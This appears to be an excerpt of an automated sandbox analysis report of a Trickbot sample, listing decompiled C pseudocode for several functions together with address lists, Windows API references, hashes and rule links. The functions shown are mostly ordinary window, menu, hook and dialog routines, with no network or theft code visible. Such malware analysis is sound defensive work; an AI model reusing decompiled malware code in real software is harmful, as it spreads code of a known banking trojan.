				EnterCriticalSection(0x44d320);
				if( *0x44d394 == _t58) {
					L10:
					_t56 =  *0x44d398; // 0x0
					LeaveCriticalSection(0x44d320);
					_t59 =  *(_t64 + 0x18);
					_t51 =  *(_t64 + 0x20);
					__eflags = _t59 - 3;
					if(_t59 == 3) {
						_t61 =  *_t51;
						__eflags =  *((intOrPtr*)(_t61 + 0x28)) - 0x8002;
						if( *((intOrPtr*)(_t61 + 0x28)) != 0x8002) {
							__eflags =  *(_t56 * 4 + 0x44d3b0 + _t56 * 4 * 4) & 0x00000001;
							if(__eflags != 0) {
								_t35 = E00411E20(__eflags,  *(_t61 + 0xc));
								_t64 = _t64 + 4;
								__eflags = _t35;
								if(__eflags != 0) {
									L24:
									_push( *(_t61 + 0xc));
									_push(1);
									_push(0xffff);
									_push( *(_t64 + 0x1c));
									E004121F0(__eflags);
									_t64 = _t64 + 0x10;
								} else {
									_t38 =  *(_t61 + 0xc);
									__eflags = _t38;
									if(_t38 != 0) {
										__eflags =  *0x44d362 - 0x18;
										if(__eflags != 0) {
											_t40 = E00411E20(__eflags, GetParent(_t38));
											_t64 = _t64 + 4;
											__eflags = _t40;
											if(__eflags != 0) {
												goto L24;
											}
										}
									}
								}
							}
						} else {
							__eflags =  *0x44d362 - 0x20;
							if( *0x44d362 != 0x20) {
								E00410800( *(_t64 + 0x1c), E00411AF0);
								_t64 = _t64 + 8;
							} else {
								__eflags =  *0x44d360 - 0x35f;
								if( *0x44d360 < 0x35f) {
									L15:
									 *(_t64 + 0x10) = 1;
								} else {
									_t47 = GetWindowLongA( *(_t64 + 0x1c), 0xfffffff0);
									 *(_t64 + 0x10) = 0;
									__eflags = _t47 & 0x00000004;
									if((_t47 & 0x00000004) == 0) {
										goto L15;
									}
								}
								_t62 =  *(_t64 + 0x1c);
								SendMessageA( *(_t64 + 0x1c), 0x11f0, 0, _t64 + 0x10);
								__eflags =  *(_t64 + 0x10);
								if( *(_t64 + 0x10) != 0) {
									E00410660(_t62, E00411AF0);
									_t64 = _t64 + 8;
								}
							}
						}
					}
					_t57 = _t56 << 2;
					__eflags = _t57;
					_t28 = _t57 * 4; // 0x0
					return CallNextHookEx( *(_t57 + _t28 + 0x44d3a8), _t59,  *(_t64 + 0x20), _t51);
				} else {
					_t55 = 0;
					_t66 = _t55 -  *0x44d39c; // 0x0
					if(_t66 < 0) {
						_t50 = 0x44d3a4;
						while( *_t50 != _t58) {
							_t50 = _t50 + 0x14;
							_t55 = _t55 + 1;
							_t68 = _t55 -  *0x44d39c; // 0x0
							if(_t68 < 0) {
								continue;
							} else {
							}
							L7:
							_t69 = _t55 -  *0x44d39c; // 0x0
							goto L8;
						}
						 *0x44d398 = _t55;
						 *0x44d394 = _t58;
						goto L7;
					}
					L8:
					if(_t69 != 0) {
						goto L10;
					} else {
						LeaveCriticalSection(0x44d320);
						return CallNextHookEx(0,  *(_t64 + 0x18),  *(_t64 + 0x1c),  *(_t64 + 0x20));
					}
				}
			}

0x00411e6d
0x00411e74
0x00411e80
0x00411ee3
0x00411ee3
0x00411eee
0x00411ef4
0x00411ef8
0x00411efc
0x00411eff
0x00411f05
0x00411f07
0x00411f0e
0x00411f95
0x00411f9d
0x00411fa3
0x00411fa8
0x00411fab
0x00411fad
0x00411fd4
0x00411fdb
0x00411fdc
0x00411fde
0x00411fe3
0x00411fe4
0x00411fe9
0x00411faf
0x00411faf
0x00411fb2
0x00411fb4
0x00411fb6
0x00411fbe
0x00411fc8
0x00411fcd
0x00411fd0
0x00411fd2
0x00000000
0x00000000
0x00411fd2
0x00411fbe
0x00411fb4
0x00411fad
0x00411f10
0x00411f10
0x00411f18
0x00411f84
0x00411f89
0x00411f1a
0x00411f1a
0x00411f23
0x00411f40
0x00411f40
0x00411f25
0x00411f32
0x00411f34
0x00411f3c
0x00411f3e
0x00000000
0x00000000
0x00411f3e
0x00411f48
0x00411f59
0x00411f5f
0x00411f64
0x00411f70
0x00411f75
0x00411f75
0x00411f64
0x00411f18
0x00411f0e
0x00411fec
0x00411fec
0x00411ff4
0x0041200b
0x00411e82
0x00411e82
0x00411e84
0x00411e8a
0x00411e8c
0x00411e91
0x00411e95
0x00411e98
0x00411e99
0x00411e9f
0x00000000
0x00000000
0x00411ea1
0x00411eaf
0x00411eaf
0x00000000
0x00411eaf
0x00411ea3
0x00411ea9
0x00000000
0x00411ea9
0x00411eb5
0x00411eb5
0x00000000
0x00411eb7
0x00411ebc
0x00411ee0
0x00411ee0
0x00411eb5

APIs

GetCurrentThreadId.KERNEL32 ref: 00411E67
EnterCriticalSection.KERNEL32(0044D320), ref: 00411E74
LeaveCriticalSection.KERNEL32(0044D320), ref: 00411EBC
CallNextHookEx.USER32(00000000,?,?,?), ref: 00411ED3
LeaveCriticalSection.KERNEL32(0044D320), ref: 00411EEE
GetWindowLongA.USER32(?,000000F0), ref: 00411F32
SendMessageA.USER32(?,000011F0,00000000,00000001), ref: 00411F59
GetParent.USER32(?), ref: 00411FC1
CallNextHookEx.USER32(00000000,?,?,?), ref: 00411FFE

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CriticalSection$CallHookLeaveNext$CurrentEnterLongMessageParentSendThreadWindow
String ID:
API String ID: 1151315845-0
Opcode ID: 7c296e72cc49e1848fc4b26e7d4e687d229dd7d636ab293c9f5c1f9e134043c9
Instruction ID: 566123adae329056eb8d190a0be39afb99822f784079320abbbb04965ed9e31a
Opcode Fuzzy Hash: 7c296e72cc49e1848fc4b26e7d4e687d229dd7d636ab293c9f5c1f9e134043c9
Instruction Fuzzy Hash: 8141B075A04301ABD710DF94EC85FAB77A8EB45714F00012AFE45832A1D7B8E889CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00428DD6, Relevance: 13.6, APIs: 9, Instructions: 127
timekeyboardCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00428DD6(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebp;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				void* _t68;
				void* _t72;
				intOrPtr _t81;
				void* _t82;
				intOrPtr _t83;
				struct HWND__* _t85;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t88;

				_t87 = __ecx;
				_t42 = GetKeyState(1);
				if(_t42 < 0) {
					L31:
					return _t42;
				}
				_t83 = E00432335();
				_v12 = _t83;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t87 + 0x1c),  &_v20);
				_t49 =  *((intOrPtr*)( *_t87 + 0x64))(_v20.x, _v20.y, 0, _t82);
				_v8 = _t49;
				if(_t49 < 0) {
					 *(_t83 + 0x104) =  *(_t83 + 0x104) | 0xffffffff;
					L16:
					if(_v8 < 0) {
						L25:
						if( *(_v12 + 0x104) == 0xffffffff) {
							KillTimer( *(_t87 + 0x1c), 0xe001);
						}
						 *((intOrPtr*)( *_t87 + 0xdc))(0xffffffff);
						L28:
						_t42 = 0xe000;
						if(_a4 != 0xe000) {
							goto L31;
						}
						_t42 = KillTimer( *(_t87 + 0x1c), 0xe000);
						if(_v8 < 0) {
							goto L31;
						}
						return  *((intOrPtr*)( *_t87 + 0xdc))(_v8);
					}
					ClientToScreen( *(_t87 + 0x1c),  &_v20);
					_push(_v20.y);
					_t85 = WindowFromPoint(_v20);
					if(_t85 == 0) {
						L23:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x104) =  *(_v12 + 0x104) | 0xffffffff;
						L24:
						if(_v8 >= 0) {
							goto L28;
						}
						goto L25;
					}
					_t60 =  *(_t87 + 0x1c);
					if(_t85 == _t60 || IsChild(_t60, _t85) != 0) {
						goto L24;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0xcc));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
						}
						if(_t63 == _t85) {
							goto L24;
						} else {
							goto L23;
						}
					}
				}
				_t72 = E00419DFD(_t87);
				if(E00419E69(_t87) == 0 || E0041B7FA(_t72) == 0) {
					_v8 = _v8 | 0xffffffff;
				}
				_t66 =  *((intOrPtr*)(_t83 + 0xcc));
				if(_t66 != 0) {
					_t86 =  *((intOrPtr*)(_t66 + 0x1c));
				} else {
					_t86 = 0;
				}
				_t68 = E0041884D(_t88, GetCapture());
				if(_t68 != _t87) {
					if(_t68 != 0) {
						_t81 =  *((intOrPtr*)(_t68 + 0x1c));
					} else {
						_t81 = 0;
					}
					if(_t81 != _t86 && E00419DFD(_t68) == _t72) {
						_v8 = _v8 | 0xffffffff;
					}
				}
				goto L16;
			}

0x00428dde
0x00428de2
0x00428deb
0x00428f43
0x00428f43
0x00428f43
0x00428df7
0x00428dfd
0x00428e00
0x00428e0d
0x00428e1f
0x00428e24
0x00428e27
0x00428e8d
0x00428e94
0x00428e9e
0x00428efa
0x00428f04
0x00428f0e
0x00428f0e
0x00428f16
0x00428f1c
0x00428f1c
0x00428f25
0x00000000
0x00000000
0x00428f2b
0x00428f31
0x00000000
0x00000000
0x00000000
0x00428f3a
0x00428ea7
0x00428ead
0x00428eb9
0x00428ebd
0x00428ee6
0x00428ee6
0x00428ee9
0x00428eed
0x00428ef4
0x00428ef8
0x00000000
0x00000000
0x00000000
0x00428ef8
0x00428ebf
0x00428ec4
0x00000000
0x00428ed2
0x00428ed5
0x00428edd
0x00428edf
0x00428edf
0x00428ee4
0x00000000
0x00000000
0x00000000
0x00000000
0x00428ee4
0x00428ec4
0x00428e32
0x00428e3b
0x00428e48
0x00428e48
0x00428e4c
0x00428e54
0x00428e5a
0x00428e56
0x00428e56
0x00428e56
0x00428e64
0x00428e6b
0x00428e6f
0x00428e75
0x00428e71
0x00428e71
0x00428e71
0x00428e7a
0x00428e87
0x00428e87
0x00428e7a
0x00000000

APIs

GetKeyState.USER32(00000001), ref: 00428DE2
GetCursorPos.USER32(?), ref: 00428E00
ScreenToClient.USER32(?,?), ref: 00428E0D
GetCapture.USER32 ref: 00428E5D

Part of subcall function 0041B7FA: IsWindowEnabled.USER32(?), ref: 0041B804

ClientToScreen.USER32(?,?), ref: 00428EA7
WindowFromPoint.USER32(?,?), ref: 00428EB3
IsChild.USER32(?,00000000), ref: 00428EC8
KillTimer.USER32(?,0000E001), ref: 00428F0E
KillTimer.USER32(?,0000E000), ref: 00428F2B

Part of subcall function 00419E69: GetForegroundWindow.USER32 ref: 00419E6D
Part of subcall function 00419E69: GetLastActivePopup.USER32(?), ref: 00419E85

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
String ID:
API String ID: 1383385731-0
Opcode ID: e5fbce50810550d46d8ed74f656d5b0de3f5a08dcde35e27ad7a0dee953dc1f0
Instruction ID: 19b93b02eaa40a217b1260908b1a439f07e08304da6157451def390ab9c29590
Opcode Fuzzy Hash: e5fbce50810550d46d8ed74f656d5b0de3f5a08dcde35e27ad7a0dee953dc1f0
Instruction Fuzzy Hash: 3D419D31701211EFDB209F65DC88AAE77B6AF44324F61466EE421D72E1DB78DD42CB08

Uniqueness

Uniqueness Score: -1.00%

Function 0041784E, Relevance: 13.6, APIs: 9, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0041784E(intOrPtr* __ecx) {
				void* __esi;
				signed int _t40;
				struct HWND__* _t45;
				signed int _t49;
				signed char _t54;
				struct HWND__* _t56;
				struct HINSTANCE__* _t61;
				void* _t63;
				void* _t74;
				intOrPtr* _t78;
				void* _t80;
				void* _t82;

				E00405340(E00437754, _t80);
				_t78 = __ecx;
				 *((intOrPtr*)(_t80 - 0x10)) = _t82 - 0x18;
				 *((intOrPtr*)(_t80 - 0x1c)) = __ecx;
				_t74 =  *(__ecx + 0x44);
				 *(_t80 - 0x18) =  *(__ecx + 0x48);
				_t40 = E00432562();
				_t61 =  *(_t40 + 0xc);
				if( *(_t78 + 0x40) != 0) {
					_t61 =  *(E00432562() + 0xc);
					_t40 = LoadResource(_t61, FindResourceA(_t61,  *(_t78 + 0x40), 5));
					_t74 = _t40;
				}
				if(_t74 != 0) {
					_t40 = LockResource(_t74);
					 *(_t80 - 0x18) = _t40;
				}
				if( *(_t80 - 0x18) != 0) {
					 *(_t80 - 0x14) = E004177D2(_t78);
					E00418D4C();
					__eflags =  *(_t80 - 0x14);
					 *(_t80 - 0x20) = 0;
					if( *(_t80 - 0x14) != 0) {
						_t56 = IsWindowEnabled( *(_t80 - 0x14));
						__eflags = _t56;
						if(_t56 != 0) {
							EnableWindow( *(_t80 - 0x14), 0);
							 *(_t80 - 0x20) = 1;
						}
					}
					 *(_t80 - 4) = 0;
					E00418D00(_t80, _t78);
					_t45 = E0041755F(_t78,  *(_t80 - 0x18), E0041884D(_t80,  *(_t80 - 0x14)), _t61);
					__eflags = _t45;
					if(_t45 != 0) {
						__eflags =  *(_t78 + 0x24) & 0x00000010;
						if(( *(_t78 + 0x24) & 0x00000010) != 0) {
							_t63 = 4;
							_t54 = E0041B66F(_t78);
							__eflags = _t54 & 0x00000001;
							if((_t54 & 0x00000001) != 0) {
								_t63 = 5;
							}
							_push(_t63);
							E0041B024(_t78);
						}
						__eflags =  *(_t78 + 0x1c);
						if( *(_t78 + 0x1c) != 0) {
							E0041B784(_t78, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
					__eflags =  *(_t80 - 0x20);
					if( *(_t80 - 0x20) != 0) {
						EnableWindow( *(_t80 - 0x14), 1);
					}
					__eflags =  *(_t80 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t78 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t80 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t78 + 0x58))();
					E0041780C(_t78, _t78, __eflags);
					_t49 =  *(_t78 + 0x2c);
				} else {
					_t49 = _t40 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
				return _t49;
			}

0x00417853
0x0041785d
0x00417860
0x00417863
0x00417869
0x0041786c
0x0041786f
0x00417878
0x0041787b
0x00417882
0x00417893
0x00417899
0x00417899
0x0041789d
0x004178a0
0x004178a6
0x004178a6
0x004178ad
0x004178be
0x004178c1
0x004178c8
0x004178cb
0x004178ce
0x004178d3
0x004178d9
0x004178db
0x004178e1
0x004178e7
0x004178e7
0x004178db
0x004178ef
0x004178f2
0x00417906
0x0041790b
0x0041790d
0x0041790f
0x00417913
0x00417919
0x0041791a
0x0041791f
0x00417922
0x00417926
0x00417926
0x00417927
0x0041792a
0x0041792a
0x0041792f
0x00417932
0x00417940
0x00417940
0x00417932
0x00417961
0x00417965
0x00417968
0x0041796f
0x0041796f
0x00417975
0x00417978
0x00417980
0x00417983
0x00417988
0x00417988
0x00417983
0x00417992
0x00417997
0x0041799c
0x004178af
0x004178af
0x004178af
0x004179a4
0x004179ad

APIs

__EH_prolog.LIBCMT ref: 00417853
FindResourceA.KERNEL32(?,00000000,00000005), ref: 0041788B
LoadResource.KERNEL32(?,00000000), ref: 00417893

Part of subcall function 00418D4C: UnhookWindowsHookEx.USER32(?), ref: 00418D71

LockResource.KERNEL32(?), ref: 004178A0
IsWindowEnabled.USER32(?), ref: 004178D3
EnableWindow.USER32(?,00000000), ref: 004178E1
EnableWindow.USER32(?,00000001), ref: 0041796F
GetActiveWindow.USER32 ref: 0041797A
SetActiveWindow.USER32(?), ref: 00417988

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
String ID:
API String ID: 401145483-0
Opcode ID: 55f4f651615edf0b421152356afd6a3bd07eac2c458a828ba3dd18a63a6d0bae
Instruction ID: df77f07aa3b0ffd03d4ea8f7affb4ed44756e49cd40aa01723e3664a9dcdd2ed
Opcode Fuzzy Hash: 55f4f651615edf0b421152356afd6a3bd07eac2c458a828ba3dd18a63a6d0bae
Instruction Fuzzy Hash: 4B41B0B1904704EFEB21AF64C849AEEBBB5EF48711F10012FF502A22D1CBB95D80CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004280F7, Relevance: 13.6, APIs: 9, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004280F7(signed int __ecx) {
				void* _t33;
				void* _t34;
				CHAR* _t41;
				signed int _t42;
				signed int _t43;
				struct HWND__* _t44;
				signed int _t51;
				void* _t53;
				signed int _t62;
				signed int _t73;
				signed int _t75;
				void* _t77;

				E00405340(E00438158, _t77);
				_push(__ecx);
				_t51 =  *(_t77 + 0xc);
				_t62 = __ecx;
				_t33 = 0x80c83b00;
				 *(_t77 - 0x10) = __ecx;
				 *((intOrPtr*)(__ecx + 0xb0)) = 1;
				if((_t51 & 0x00000004) != 0) {
					_t33 = 0x80c83300;
				}
				_t34 = E0042F41A(_t62, 0, 0, 0x449788, _t33, 0x44b2c0,  *((intOrPtr*)(_t77 + 8)), 0);
				if(_t34 != 0) {
					asm("sbb esi, esi");
					_t73 = ( ~(_t51 & 0x00005000) & 0x0000f000) + 0x00002000 | _t51 & 0x00000040;
					_push(GetSystemMenu( *(_t62 + 0x1c), 0));
					_t53 = E0041CF83();
					DeleteMenu( *(_t53 + 4), 0xf000, 0);
					DeleteMenu( *(_t53 + 4), 0xf020, 0);
					DeleteMenu( *(_t53 + 4), 0xf030, 0);
					DeleteMenu( *(_t53 + 4), 0xf120, 0);
					_t41 =  *0x447478; // 0x44748c
					 *(_t77 + 0xc) = _t41;
					 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
					_t42 = E0041C67E(_t77 + 0xc, __eflags, 0xf011);
					__eflags = _t42;
					if(_t42 != 0) {
						DeleteMenu( *(_t53 + 4), 0xf060, 0);
						AppendMenuA( *(_t53 + 4), 0, 0xf060,  *(_t77 + 0xc));
					}
					_t75 =  *(_t77 - 0x10);
					_t43 = E00427223(_t75 + 0xcc,  *((intOrPtr*)(_t77 + 8)), _t73 | 0x50000000, 0xe81f);
					__eflags = _t43;
					if(_t43 != 0) {
						__eflags = _t75;
						if(_t75 != 0) {
							_t44 =  *(_t75 + 0x1c);
						} else {
							_t44 = 0;
						}
						E0041884D(_t77, SetParent( *(_t75 + 0xe8), _t44));
						_push(1);
						_pop(0);
					}
					 *(_t75 + 0xb0) =  *(_t75 + 0xb0) & 0x00000000;
					_t27 = _t77 - 4;
					 *_t27 =  *(_t77 - 4) | 0xffffffff;
					__eflags =  *_t27;
					E00417EC8(_t77 + 0xc);
					_t34 = 0;
				} else {
					 *((intOrPtr*)(_t62 + 0xb0)) = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t34;
			}

0x004280fc
0x00428101
0x00428103
0x00428108
0x0042810a
0x00428112
0x00428115
0x0042811f
0x00428121
0x00428121
0x0042813b
0x00428142
0x0042815e
0x0042816e
0x00428176
0x00428182
0x0042818e
0x0042819a
0x004281a6
0x004281b2
0x004281b4
0x004281b9
0x004281bc
0x004281c8
0x004281cd
0x004281cf
0x004281db
0x004281ea
0x004281ea
0x004281fc
0x00428208
0x0042820d
0x0042820f
0x00428215
0x00428217
0x0042821d
0x00428219
0x00428219
0x00428219
0x0042822e
0x00428233
0x00428235
0x00428235
0x00428236
0x0042823d
0x0042823d
0x0042823d
0x00428244
0x00428249
0x00428144
0x00428144
0x00428144
0x00428251
0x00428259

APIs

__EH_prolog.LIBCMT ref: 004280FC
GetSystemMenu.USER32(?,00000000), ref: 00428170
DeleteMenu.USER32(?,0000F000,00000000), ref: 0042818E
DeleteMenu.USER32(?,0000F020,00000000), ref: 0042819A
DeleteMenu.USER32(?,0000F030,00000000), ref: 004281A6
DeleteMenu.USER32(?,0000F120,00000000), ref: 004281B2
DeleteMenu.USER32(?,0000F060,00000000), ref: 004281DB
AppendMenuA.USER32(?,00000000,0000F060,?), ref: 004281EA
SetParent.USER32(?,?), ref: 00428227

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Menu$Delete$AppendH_prologParentSystem
String ID:
API String ID: 3391233131-0
Opcode ID: 6a152e9788b5ff6521e4e8cf5f6a8124d2964ab76b8c664bcbc592c19217963e
Instruction ID: d5ab09647c54943920d7376705d625934b6c60ac671d2df8162f1bd9f4bb883e
Opcode Fuzzy Hash: 6a152e9788b5ff6521e4e8cf5f6a8124d2964ab76b8c664bcbc592c19217963e
Instruction Fuzzy Hash: C931B731780615FBEB205F61DC46F9EBA65EF54710F108139F9156B1E1CBB8AC01DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00415C80, Relevance: 13.6, APIs: 9, Instructions: 80
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00415C80(void* __ebx) {
				int _v4;
				struct HWND__* _v8;
				void* __ecx;
				void* __esi;
				void* __ebp;
				struct HWND__* _t28;
				int _t32;
				int _t33;
				int _t35;
				void* _t36;
				void* _t41;
				void* _t42;
				signed int _t44;
				signed int _t53;
				void* _t56;

				_t41 = __ebx;
				_t53 = _t44;
				E00405360(lstrlenA( *(_t53 + 0x78)) + 1 +  *(_t53 + 0x78), 0,  *((intOrPtr*)(_t53 + 0x7c)) - lstrlenA( *(_t53 + 0x78)) + 1);
				_v8 = GetFocus();
				 *(_t53 + 0x60) = E004177D2(_t53);
				E00418D4C();
				_t28 =  *(_t53 + 0x60);
				_t56 = EnableWindow;
				if(_t28 != 0 && IsWindowEnabled(_t28) != 0) {
					_push(1);
					_pop(0);
					EnableWindow( *(_t53 + 0x60), 0);
				}
				_push(_t41);
				_t42 = E00432335();
				if(( *(_t53 + 0x92) & 0x00000008) == 0) {
					E00418D00(_t56, _t53);
				} else {
					 *(_t42 + 0x18) = _t53;
				}
				_push(_t53 + 0x5c);
				if( *((intOrPtr*)(_t53 + 0xa8)) == 0) {
					_t32 = GetSaveFileNameA();
				} else {
					_t32 = GetOpenFileNameA();
				}
				 *(_t42 + 0x18) =  *(_t42 + 0x18) & 0x00000000;
				_v4 = _t32;
				if(0 != 0) {
					EnableWindow( *(_t53 + 0x60), 1);
				}
				_t33 = IsWindow(_v8);
				_t65 = _t33;
				if(_t33 != 0) {
					SetFocus(_v8);
				}
				E0041780C(_t53, _t53, _t65);
				_t35 = _v4;
				if(_t35 == 0) {
					_t36 = 2;
					return _t36;
				}
				return _t35;
			}

0x00415c80
0x00415c84
0x00415c9d
0x00415cad
0x00415cb8
0x00415cbb
0x00415cc0
0x00415cc3
0x00415ccb
0x00415cd8
0x00415cda
0x00415ce0
0x00415ce0
0x00415ce2
0x00415cef
0x00415cf1
0x00415cf9
0x00415cf3
0x00415cf3
0x00415cf3
0x00415d08
0x00415d09
0x00415d12
0x00415d0b
0x00415d0b
0x00415d0b
0x00415d17
0x00415d1b
0x00415d22
0x00415d29
0x00415d29
0x00415d2f
0x00415d35
0x00415d37
0x00415d3d
0x00415d3d
0x00415d45
0x00415d4a
0x00415d53
0x00415d57
0x00000000
0x00415d57
0x00415d5a

APIs

lstrlenA.KERNEL32(?), ref: 00415C8A
GetFocus.USER32 ref: 00415CA5

Part of subcall function 00418D4C: UnhookWindowsHookEx.USER32(?), ref: 00418D71

IsWindowEnabled.USER32(?), ref: 00415CCE
EnableWindow.USER32(?,00000000), ref: 00415CE0
GetOpenFileNameA.COMDLG32(?), ref: 00415D0B
GetSaveFileNameA.COMDLG32(?), ref: 00415D12
EnableWindow.USER32(?,00000001), ref: 00415D29
IsWindow.USER32(00000000), ref: 00415D2F
SetFocus.USER32(00000000), ref: 00415D3D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$EnableFileFocusName$EnabledHookOpenSaveUnhookWindowslstrlen
String ID:
API String ID: 3606897497-0
Opcode ID: 58ef713467245c72f238f1a804a6061d6d9588cd32768a9e30d3b494f40a0663
Instruction ID: 79e5f807bf0caf71d0d310ba7aa660e886a6a09820b170437658e05476853557
Opcode Fuzzy Hash: 58ef713467245c72f238f1a804a6061d6d9588cd32768a9e30d3b494f40a0663
Instruction Fuzzy Hash: 57219571214B00ABDB116F76EC4ABDB77E4EF84314F10442FF55285291DBB9D880CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042BD2C, Relevance: 13.6, APIs: 9, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042BD2C(void* __eflags, signed int _a4, intOrPtr _a8) {
				struct HWND__* _v4;
				void* __ecx;
				struct HWND__* _t26;
				int _t30;
				struct HWND__* _t36;
				int* _t37;
				intOrPtr* _t38;
				intOrPtr* _t43;

				_t43 = _t38;
				if(( *(E0042BD0C(_t38, __eflags) + 4) & 0x00002020) == 0) {
					L8:
					return E004187B4(_t43);
				}
				_t36 = GetDlgItem( *(_t43 + 0x1c), _a4);
				if(_t36 == 0 || (GetWindowLongA(_t36, 0xfffffff0) & 0x10000000) == 0 || IsWindowEnabled(_t36) == 0) {
					_a4 = _a4 & 0x00000000;
					_t37 = 0x43a1d0;
					while(1) {
						_t26 = GetDlgItem( *(_t43 + 0x1c),  *_t37);
						_v4 = _t26;
						if((GetWindowLongA(_t26, 0xfffffff0) & 0x10000000) != 0 && IsWindowEnabled(_v4) != 0) {
							break;
						}
						_a4 = _a4 + 1;
						_t37 =  &(_t37[1]);
						if(_t37 < 0x43a1e0) {
							continue;
						}
						goto L8;
					}
					_t30 = IsWindowEnabled(GetFocus());
					__eflags = _t30;
					if(_t30 == 0) {
						SetFocus(_v4);
					}
					return  *((intOrPtr*)( *_t43 + 0xa0))(0x401, 0x43a1d0[_a4], _a8);
				} else {
					goto L8;
				}
			}

0x0042bd31
0x0042bd3e
0x0042bdb0
0x00000000
0x0042bdb2
0x0042bd55
0x0042bd59
0x0042bd72
0x0042bd77
0x0042bd7c
0x0042bd81
0x0042bd86
0x0042bd91
0x00000000
0x00000000
0x0042bda1
0x0042bda5
0x0042bdae
0x00000000
0x00000000
0x00000000
0x0042bdae
0x0042bdc6
0x0042bdcc
0x0042bdce
0x0042bdd4
0x0042bdd4
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetDlgItem.USER32(?,?), ref: 0042BD4D
GetWindowLongA.USER32(00000000,000000F0), ref: 0042BD5E
IsWindowEnabled.USER32(00000000), ref: 0042BD68
GetDlgItem.USER32(?,0043A1D0), ref: 0042BD81
GetWindowLongA.USER32(00000000,000000F0), ref: 0042BD8A
IsWindowEnabled.USER32(?), ref: 0042BD97
GetFocus.USER32 ref: 0042BDBF
IsWindowEnabled.USER32(00000000), ref: 0042BDC6
SetFocus.USER32(?), ref: 0042BDD4

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

